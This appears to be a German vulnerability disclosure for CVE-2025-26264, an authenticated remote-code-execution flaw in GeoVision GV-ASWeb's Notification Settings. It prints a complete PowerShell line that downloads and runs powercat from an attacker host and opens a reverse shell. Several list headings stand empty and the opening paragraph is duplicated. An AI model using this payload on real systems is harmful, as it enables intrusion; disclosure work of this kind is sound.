
CVE-2025-26264 – GeoVision GV-ASWeb mit der Version 6.1.2.0 oder niedriger enthält eine Schwachstelle zur Remote-Codeausführung (RCE) in der Funktion „Notification Settings“. Ein authentifizierter Angreifer mit „System Settings“-Berechtigungen in ASWeb kann diesen Fehler ausnutzen, um beliebige Befehle auf dem Server auszuführen, was zu einer vollständigen Kompromittierung des Systems führt.
CVE-2025-26264 - GeoVision GV-ASWeb in Version 6.1.2.0 oder niedriger enthält eine Remote Code Execution (RCE)-Schwachstelle in seiner Funktion Notification Settings. Ein authentifizierter Angreifer mit "System Settings"-Berechtigungen in ASWeb kann diesen Fehler ausnutzen, um beliebige Befehle auf dem Server auszuführen, was zu einer vollständigen Systemkompromittierung führt.
Für einen erfolgreichen Angriff benötigt ein Angreifer:
Die Schwachstelle kann genutzt werden, um die folgenden unbefugten Aktionen durchzuführen:
Die Ausnutzung der Remote Code Execution-Schwachstelle in der ASWeb-Plattform von GeoVision GV-ASManager ist gegen Versionen 6.1.2.0 oder niedriger möglich (Stand: 26. Februar 2025 gibt es keinen Fix).
Die ASWeb-Funktion Notification Setting von GeoVision ASManager ist anfällig für RCE
HTTP-Anfrage zum Einrichten einer Benachrichtigung für ein bestimmtes Ereignis: Fehlgeschlagener TAWeb-Anmeldeversuch
powershell.exe Set-ExecutionPolicy Bypass -Force;IEX(New-Object System.Net.WebClient).DownloadString('http://LHOST/powercat.ps1');powercat -c LHOST -p LPORT -e powershell
Ein fehlgeschlagener Authentifizierungsversuch in TAWeb
Host des Opfers: Das Skript öffnet eine Backdoor zum Host des Angreifers.
Host des Angreifers: Ein Angreifer erhält die Shell
Wenn Sie eine Frage haben, können Sie mich auf LinkedIn kontaktieren: Giorgi Dograshvili.